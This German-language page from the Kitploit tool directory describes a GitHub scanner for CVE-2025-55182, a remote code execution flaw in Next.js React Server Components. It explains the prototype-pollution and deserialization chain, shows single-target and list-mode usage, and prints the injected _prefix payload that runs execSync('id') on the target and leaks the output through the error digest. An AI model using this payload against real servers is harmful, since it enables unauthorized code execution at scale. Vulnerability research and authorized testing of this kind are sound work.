Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182-Scanner — Sicherheitsscanner für CVE-2025-55182 - Kritische RCE-Sicherheitslücke in React Server Components | Kitploit
Tools/GitHubGitHub/f0xyx/cve-2025-55182-scanner
SchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubf0xyx/cve-2025-55182-scanner

CVE-2025-55182-Scanner

Sicherheitsscanner für CVE-2025-55182 - Kritische RCE-Sicherheitslücke in React Server Components

Repository anzeigen
1vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE‑2025‑55182 – Next.js RSC Deserialisierungs-RCE-Scanner

Dieses Tool prüft, ob ein Ziel für CVE‑2025‑55182 anfällig ist, einen Remote Code Execution-Fehler, der durch unsichere Handhabung von RSC (React Server Components)-Modell-Payloads in Next.js verursacht wird.
Die Schwachstelle verknüpft Prototype Pollution → Deserialisierungsmissbrauch → serverseitige JavaScript-Ausführung.

Haftungsausschluss: Verwenden Sie dies nur auf Systemen, die Ihnen rechtmäßig gehören oder für die Sie eine ausdrückliche Genehmigung haben. Unberechtigtes Testen = Straftat, Bruder.


🔥 Wie diese Schwachstelle funktioniert

Next.js verarbeitet intern spezielle „Model“-Objekte, die über multipart/form-data gesendet werden.
Wenn ein Angreifer eine bösartige Struktur wie einen gefälschten thenable injiziert, kann er Folgendes manipulieren:

  • __proto__
  • _response._prefix
  • constructor.constructor
  • und andere interne Komponenten

Dies führt dazu, dass der Server angreifergesteuertes JavaScript auswertet, was zu vollständiger RCE führt.


📌 Was dieses Skript macht

  • Akzeptiert eine einzelne URL (-u) oder eine Liste von Zielen (-l)
  • Sendet einen manipulierten Multipart/Deserialisierungs-Payload
  • Extrahiert die Befehlsausgabe (id) aus dem Server-Fehler-Digest
  • Speichert anfällige Hosts in foxvuln.txt

▶ Verwendung

Einzelne URL

root@kitploit:~
python3 main.py -u https://target.com

Listenmodus

root@kitploit:~
python3 main.py -l list.txt

📦 Payload-Übersicht

Der Payload missbraucht process.mainModule.require('child_process').execSync() über injizierten _prefix:

root@kitploit:~
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",

Dies zwingt den Server, id auszuführen und das Ergebnis im ausgelösten Digest preiszugeben (da RSC-Fehler absichtlich ein strukturiertes „digest“-Feld zurückgeben).


🧪 Beispielausgabe

Anfälliges Ziel:

root@kitploit:~
[+] Testing: https://victim.com
[VULN] user : uid=1000(www-data)

Nicht anfällig:

root@kitploit:~
[+] Testing: https://secure.com
[NOT VULN]

🗂 Ausgabedatei

Alle bestätigten anfälligen URLs werden gespeichert in:

root@kitploit:~
foxvuln.txt

Format:

root@kitploit:~
https://victim.com => uid=1000(www-data)

🧠 Hinweise

  • Funktioniert nur auf Endpunkten, die Next.js RSC-Streaming-Payloads verarbeiten
  • Kein Brute-Force von Routen – geht davon aus, dass der Host den POST unter / verarbeitet
  • Timeout ist auf 10s pro Host gesetzt
  • In Laborumgebungen völlig sicher – aber führen Sie dies nicht auf beliebigen Servern aus, es sei denn, Sie möchten eine Straftat im Schnelldurchlauf begehen

Tool herunterladen